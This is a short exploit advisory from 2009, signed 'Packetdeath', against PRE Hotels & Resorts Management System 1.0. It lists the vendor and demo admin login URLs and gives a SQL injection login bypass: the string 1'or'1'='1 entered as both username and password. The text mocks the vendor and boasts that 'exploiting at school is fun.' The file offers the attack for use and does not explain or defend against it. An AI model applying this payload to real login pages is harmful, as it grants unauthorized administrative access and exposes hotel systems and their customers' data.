prehotelsresorts-sql.txt
Posted on 22 December 2009
____ _ ____ _ __ U _____ u _____ ____ U _____ u _ _____ _ _ U| _" uU /" uU /"___| |"|/ / | ___"|/|_ " _|| _" | ___"|/U /" u |_ " _| |'| |'| | |_) |/ / _ / | | u | ' / | _|" | | /| | | | | _|" / _ / | | /| |_| |\n| __/ / ___ | |/__U/| . \u | |___ /| |U| |_| || |___ / ___ /| | U| _ |u |_| /_/ \_ \____| |_|\_ |_____| u |_|U |____/ u|_____| /_/ \_ u |_|U |_| |_| ||>>_ \ >> _// \,-,>> \,-.<< >> _// \_ |||_ << >> \ >> _// \_ // \ (__)__) (__) (__)__)(__).) (_/(__) (__)__) (__)__)_) (__) (__)(__) (__)__) (__)_") ("_) -------------------------------------------------------------------------------------------------- Author: Packetdeath Homepage: www.it-security.biz D/T: 12:54 PM 12/18/2009 Contact: yaii_abc@hotmail.com -------------------------------------------------------------------------------------------------- Target: PRE HOTELS & RESORTS MANAGEMENT SYSTEM [login bypass VIA SQL iNJECTION] URL: http://www.preprojects.com/hotel.asp Demo: http://www.aebest.com/home/home.asp Admin demo: http://www.aebest.com/trial_admin/admin_login.asp Version: 1.0 Price: $44.00 ^^ And we paid for security? ------------------------------------------------------------------------ Tested on XP/SP3 [EN] ------------------------------------------------------------------------ Side note: bi0 is the shit, and exploiting at school is fun. ------------------------------------------------------------------------ Greetz: bi0, Annexxempire, code4fun, Lo$er, c0nd0m, sp1r1t, Cr0nix Rest in peace Rock4Ever! You will be missed. from your family at SSTeam. ------------------------------------------------------------------------ Exploit: http://[server]/[path]/admin_login.asp Navagate to login page and enter: Username: 1'or'1'='1 Password: 1'or'1'='1 ------------------------------------------------------------------------ becuase 1 is always equal to 1.... Pools Closed, LOL!!!!! Wha /Packetdeath
